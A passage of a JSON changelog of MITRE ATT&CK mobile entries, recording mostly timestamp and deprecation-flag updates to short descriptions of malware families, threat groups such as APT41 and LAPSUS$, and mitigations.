{\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:26.968000+00:00\", \"old_value\": \"2025-04-16 21:22:08.784000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--2740eaf6-2db2-4a40-a63f-f5b166c7059c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:40:19.697000+00:00", + "name": "XLoader for Android", + "description": "[XLoader for Android](https://attack.mitre.org/software/S0318) is a malicious Android app first observed targeting Japan, Korea, China, Taiwan, and Hong Kong in 2018. It has more recently been observed targeting South Korean users as a pornography application.(Citation: TrendMicro-XLoader-FakeSpy)(Citation: TrendMicro-XLoader) It is tracked separately from the [XLoader for iOS](https://attack.mitre.org/software/S0490).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0318", + "external_id": "S0318" + }, + { + "source_name": "XLoader for Android", + "description": "(Citation: TrendMicro-XLoader)" + }, + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/" + }, + { + "source_name": "TrendMicro-XLoader", + "description": "Lorin Wu. (2018, April 19). XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing. Retrieved July 6, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/xloader-android-spyware-and-banking-trojan-distributed-via-dns-spoofing/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "XLoader for Android" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:19.697000+00:00\", \"old_value\": \"2025-04-16 21:22:05.761000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--29944858-da52-4d3d-b428-f8a6eb8dde6f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-20 13:58:53.422000+00:00", + "modified": "2025-04-25 14:40:20.425000+00:00", + "name": "XLoader for iOS", + "description": "[XLoader for iOS](https://attack.mitre.org/software/S0490) is a malicious iOS application that is capable of gathering system information.(Citation: TrendMicro-XLoader-FakeSpy) It is tracked separately from the [XLoader for Android](https://attack.mitre.org/software/S0318).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0490", + "external_id": "S0490" + }, + { + "source_name": "TrendMicro-XLoader-FakeSpy", + "description": "Hiroaki, H., Wu, L., Wu, L.. (2019, April 2). XLoader Disguises as Android Apps, Has FakeSpy Links. Retrieved July 20, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/new-version-of-xloader-that-disguises-as-android-apps-and-an-ios-profile-holds-new-links-to-fakespy/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "XLoader for iOS" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:20.425000+00:00\", \"old_value\": \"2025-04-16 21:22:06.053000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "tool", + "id": "tool--da21929e-40c0-443d-bdf4-6b60d15448b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:48.609000+00:00", + "modified": "2025-04-25 14:40:48.566000+00:00", + "name": "Xbot", + "description": "[Xbot](https://attack.mitre.org/software/S0298) is an Android malware family that was observed in 2016 primarily targeting Android users in Russia and Australia. (Citation: PaloAlto-Xbot)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0298", + "external_id": "S0298" + }, + { + "source_name": "Xbot", + "description": "(Citation: PaloAlto-Xbot)" + }, + { + "source_name": "PaloAlto-Xbot", + "description": "Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). New Android Trojan \u201cXbot\u201d Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:48.566000+00:00\", \"old_value\": \"2025-04-16 21:22:17.393000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--d9e07aea-baad-4b68-bdca-90c77647d7f9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:42.661000+00:00", + "modified": "2025-04-25 14:40:42.212000+00:00", + "name": "XcodeGhost", + "description": "[XcodeGhost](https://attack.mitre.org/software/S0297) is iOS malware that infected at least 39 iOS apps in 2015 and potentially affected millions of users. (Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0297", + "external_id": "S0297" + }, + { + "source_name": "XcodeGhost", + "description": "(Citation: PaloAlto-XcodeGhost1) (Citation: PaloAlto-XcodeGhost)" + }, + { + "source_name": "PaloAlto-XcodeGhost1", + "description": "Claud Xiao. (2015, September 17). Novel Malware XcodeGhost Modifies Xcode, Infects Apple iOS Apps and Hits App Store. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/novel-malware-xcodeghost-modifies-xcode-infects-apple-ios-apps-and-hits-app-store/" + }, + { + "source_name": "PaloAlto-XcodeGhost", + "description": "Claud Xiao. (2015, September 18). Update: XcodeGhost Attacker Can Phish Passwords and Open URLs through Infected Apps. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2015/09/update-xcodeghost-attacker-can-phish-passwords-and-open-urls-though-infected-apps/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:42.212000+00:00\", \"old_value\": \"2025-04-16 21:22:14.566000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--22faaa56-a8ac-4292-9be6-b571b255ee40", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-07-27 14:14:56.729000+00:00", + "modified": "2025-04-25 14:40:18.792000+00:00", + "name": "Zen", + "description": "[Zen](https://attack.mitre.org/software/S0494) is Android malware that was first seen in 2013.(Citation: Google Security Zen)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0494", + "external_id": "S0494" + }, + { + "source_name": "Google Security Zen", + "description": "Siewierski, L. (2019, January 11). PHA Family Highlights: Zen and its cousins . Retrieved July 27, 2020.", + "url": "https://security.googleblog.com/2019/01/pha-family-highlights-zen-and-its.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Zen" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:18.792000+00:00\", \"old_value\": \"2025-04-16 21:22:05.422000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--3c3b55a6-c3e9-4043-8aae-283fe96220c0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:44.853000+00:00", + "modified": "2025-04-25 14:40:24.224000+00:00", + "name": "ZergHelper", + "description": "[ZergHelper](https://attack.mitre.org/software/S0287) is iOS riskware that was unique due to its apparent evasion of Apple's App Store review process. No malicious functionality was identified in the app, but it presents security risks. (Citation: Xiao-ZergHelper)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0287", + "external_id": "S0287" + }, + { + "source_name": "ZergHelper", + "description": "(Citation: Xiao-ZergHelper)" + }, + { + "source_name": "Xiao-ZergHelper", + "description": "Claud Xiao. (2016, February 21). Pirated iOS App Store\u2019s Client Successfully Evaded Apple iOS Code Review. Retrieved December 12, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:24.224000+00:00\", \"old_value\": \"2025-04-16 21:22:07.644000+00:00\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "groups": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "intrusion-set", + "id": "intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-09-23 13:43:36.945000+00:00", + "modified": "2025-04-22 21:56:33.318000+00:00", + "name": "APT41", + "description": "[APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting various industries, including but not limited to healthcare, telecom, technology, finance, education, retail and video game industries in 14 countries.(Citation: apt41_mandiant) Notable behaviors include using a wide range of malware and tools to complete mission objectives. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)\n", + "aliases": [ + "APT41", + "Wicked Panda", + "Brass Typhoon", + "BARIUM" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0096", + "external_id": "G0096" + }, + { + "source_name": "Wicked Panda", + "description": "(Citation: Crowdstrike GTR2020 Mar 2020)" + }, + { + "source_name": "APT41", + "description": "(Citation: FireEye APT41 2019)" + }, + { + "source_name": "Brass Typhoon", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "BARIUM", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "Crowdstrike GTR2020 Mar 2020", + "description": "Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.", + "url": "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" + }, + { + "source_name": "FireEye APT41 2019", + "description": "FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "FireEye APT41 Aug 2019", + "description": "Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "apt41_mandiant", + "description": "Mandiant. (n.d.). APT41, A DUAL ESPIONAGE AND CYBER CRIME OPERATION. Retrieved June 11, 2024.", + "url": "https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf" + }, + { + "source_name": "Microsoft Threat Actor Naming July 2023", + "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.", + "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide" + }, + { + "source_name": "Group IB APT 41 June 2021", + "description": "Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.", + "url": "https://www.group-ib.com/blog/colunmtk-apt41/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Kyaw Pyiyt Htet, @KyawPyiytHtet", + "Nikita Rostovcev, Group-IB" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "4.1", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 21:56:33.318000+00:00\", \"old_value\": \"2024-10-10 14:31:35.326000+00:00\"}}}", + "previous_version": "4.1" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-01-27 16:55:39.688000+00:00", + "modified": "2025-04-25 14:41:32.241000+00:00", + "name": "Bouncing Golf", + "description": "[Bouncing Golf](https://attack.mitre.org/groups/G0097) is a cyberespionage campaign targeting Middle Eastern countries.(Citation: Trend Micro Bouncing Golf 2019)", + "aliases": [ + "Bouncing Golf" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0097", + "external_id": "G0097" + }, + { + "source_name": "Trend Micro Bouncing Golf 2019", + "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign \u2018Bouncing Golf\u2019 Affects Middle East. Retrieved January 27, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:41:32.241000+00:00\", \"old_value\": \"2025-04-16 21:22:02.103000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--d8bc9788-4f7d-41a9-9e9d-ee1ea18a8cf7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2022-06-09 19:14:31.327000+00:00", + "modified": "2025-04-21 19:40:47.538000+00:00", + "name": "LAPSUS$", + "description": "[LAPSUS$](https://attack.mitre.org/groups/G1004) is cyber criminal threat group that has been active since at least mid-2021. [LAPSUS$](https://attack.mitre.org/groups/G1004) specializes in large-scale social engineering and extortion operations, including destructive attacks without the use of ransomware. The group has targeted organizations globally, including in the government, manufacturing, higher education, energy, healthcare, technology, telecommunications, and media sectors.(Citation: BBC LAPSUS Apr 2022)(Citation: MSTIC DEV-0537 Mar 2022)(Citation: UNIT 42 LAPSUS Mar 2022)", + "aliases": [ + "LAPSUS$", + "DEV-0537", + "Strawberry Tempest" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G1004", + "external_id": "G1004" + }, + { + "source_name": "Strawberry Tempest", + "description": "(Citation: Microsoft Threat Actor Naming July 2023)" + }, + { + "source_name": "DEV-0537", + "description": "(Citation: MSTIC DEV-0537 Mar 2022)" + }, + { + "source_name": "BBC LAPSUS Apr 2022", + "description": "BBC. (2022, April 1). LAPSUS: Two UK Teenagers Charged with Hacking for Gang. Retrieved June 9, 2022.", + "url": "https://www.bbc.com/news/technology-60953527" + }, + { + "source_name": "Microsoft Threat Actor Naming July 2023", + "description": "Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.", + "url": "https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide" + }, + { + "source_name": "MSTIC DEV-0537 Mar 2022", + "description": "MSTIC, DART, M365 Defender. (2022, March 24). DEV-0537 Criminal Actor Targeting Organizations for Data Exfiltration and Destruction. Retrieved May 17, 2022.", + "url": "https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/" + }, + { + "source_name": "UNIT 42 LAPSUS Mar 2022", + "description": "UNIT 42. (2022, March 24). Threat Brief: Lapsus$ Group. Retrieved May 17, 2022.", + "url": "https://unit42.paloaltonetworks.com/lapsus-group/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "David Hughes, BT Security", + "Matt Brenton, Zurich Insurance Group", + "Fl\u00e1vio Costa, @Seguran\u00e7a Descomplicada", + "Caio Silva" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "2.1", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-21 19:40:47.538000+00:00\", \"old_value\": \"2025-04-07 14:44:59.715000+00:00\"}, \"root['x_mitre_contributors'][2]\": {\"new_value\": \"Fl\\u00e1vio Costa, @Seguran\\u00e7a Descomplicada\", \"old_value\": \"Flavio Costa, Cisco\"}}}", + "previous_version": "2.1" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "campaigns": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "assets": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "mitigations": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "course-of-action", + "id": "course-of-action--ff4821f6-5afb-481b-8c0f-26c28c0d666c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-10-18 12:50:35.335000+00:00", + "modified": "2025-04-25 14:40:12.762000+00:00", + "name": "Attestation", + "description": "Enable remote attestation capabilities when available (such as Android SafetyNet or Samsung Knox TIMA Attestation) and prohibit devices that fail the attestation from accessing enterprise resources.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1002", + "external_id": "M1002" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:12.762000+00:00\", \"old_value\": \"2025-04-16 21:22:19.448000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--cf2cccb1-cab8-431a-8ecf-f7874d05f433", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:52.601000+00:00", + "modified": "2025-04-25 14:40:12.032000+00:00", + "name": "Deploy Compromised Device Detection Method", + "description": "A variety of methods exist that can be used to enable enterprises to identify compromised (e.g. rooted/jailbroken) devices, whether using security mechanisms built directly into the device, third-party mobile security applications, enterprise mobility management (EMM)/mobile device management (MDM) capabilities, or other methods. Some methods may be trivial to evade while others may be more sophisticated.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1010", + "external_id": "M1010" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:12.032000+00:00\", \"old_value\": \"2025-04-16 21:22:19.136000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--8220b57e-c400-4525-bf69-f8edc6b389a8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:50.769000+00:00", + "modified": "2025-04-25 14:40:10.924000+00:00", + "name": "Encrypt Network Traffic", + "description": "Application developers should encrypt all of their application network traffic using the Transport Layer Security (TLS) protocol to ensure protection of sensitive data and deter network-based attacks. If desired, application developers could perform message-based encryption of data before passing it for TLS encryption.\n\niOS's App Transport Security feature can be used to help ensure that all application network traffic is appropriately protected. Apple intends to mandate use of App Transport Security (Citation: TechCrunch-ATS) for all apps in the Apple App Store unless appropriate justification is given.\n\nAndroid's Network Security Configuration feature similarly can be used by app developers to help ensure that all of their application network traffic is appropriately protected (Citation: Android-NetworkSecurityConfig).\n\nUse of Virtual Private Network (VPN) tunnels, e.g. using the IPsec protocol, can help mitigate some types of network attacks as well.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1009", + "external_id": "M1009" + }, + { + "source_name": "TechCrunch-ATS", + "description": "Kate Conger. (2016, June 14). Apple will require HTTPS connections for iOS apps by the end of 2016. Retrieved December 19, 2016.", + "url": "https://techcrunch.com/2016/06/14/apple-will-require-https-connections-for-ios-apps-by-the-end-of-2016/" + }, + { + "source_name": "Android-NetworkSecurityConfig", + "description": "Google. (n.d.). Network Security Configuration. Retrieved December 19, 2016.", + "url": "https://developer.android.com/training/articles/security-config.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:10.924000+00:00\", \"old_value\": \"2025-04-16 21:22:18.668000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--649f7268-4c12-483b-ac84-4b7bca9fe2ee", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:53.318000+00:00", + "modified": "2025-04-25 14:40:09.487000+00:00", + "name": "Enterprise Policy", + "description": "An enterprise mobility management (EMM), also known as mobile device management (MDM), system can be used to provision policies to mobile devices to control aspects of their allowed behavior.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1012", + "external_id": "M1012" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:09.487000+00:00\", \"old_value\": \"2025-04-16 21:22:18.032000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--8ccd428d-39da-4e8f-a55b-d48ea1d56e58", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:49.554000+00:00", + "modified": "2025-04-25 14:40:11.299000+00:00", + "name": "Lock Bootloader", + "description": "On devices that provide the capability to unlock the bootloader (hence allowing any operating system code to be flashed onto the device), perform periodic checks to ensure that the bootloader is locked.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1003", + "external_id": "M1003" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:11.299000+00:00\", \"old_value\": \"2025-04-16 21:22:18.821000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--bcecd036-f40e-4916-9f8e-fd0ccf0ece8d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-10-18 12:51:36.488000+00:00", + "modified": "2025-04-25 14:40:11.661000+00:00", + "name": "Security Updates", + "description": "Install security updates in response to discovered vulnerabilities.\n\nPurchase devices with a vendor and/or mobile carrier commitment to provide security updates in a prompt manner for a set period of time.\n\nDecommission devices that will no longer receive security updates.\n\nLimit or block access to enterprise resources from devices that have not installed recent security updates.\n\nOn Android devices, access can be controlled based on each device's security patch level. On iOS devices, access can be controlled based on the iOS version.", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1001", + "external_id": "M1001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:11.661000+00:00\", \"old_value\": \"2025-04-16 21:22:18.982000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "course-of-action", + "id": "course-of-action--7b1cf46f-784b-405a-a8dd-4624c19d8321", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:52.270000+00:00", + "modified": "2025-04-25 14:40:10.556000+00:00", + "name": "System Partition Integrity", + "description": "Ensure that Android devices being used include and enable 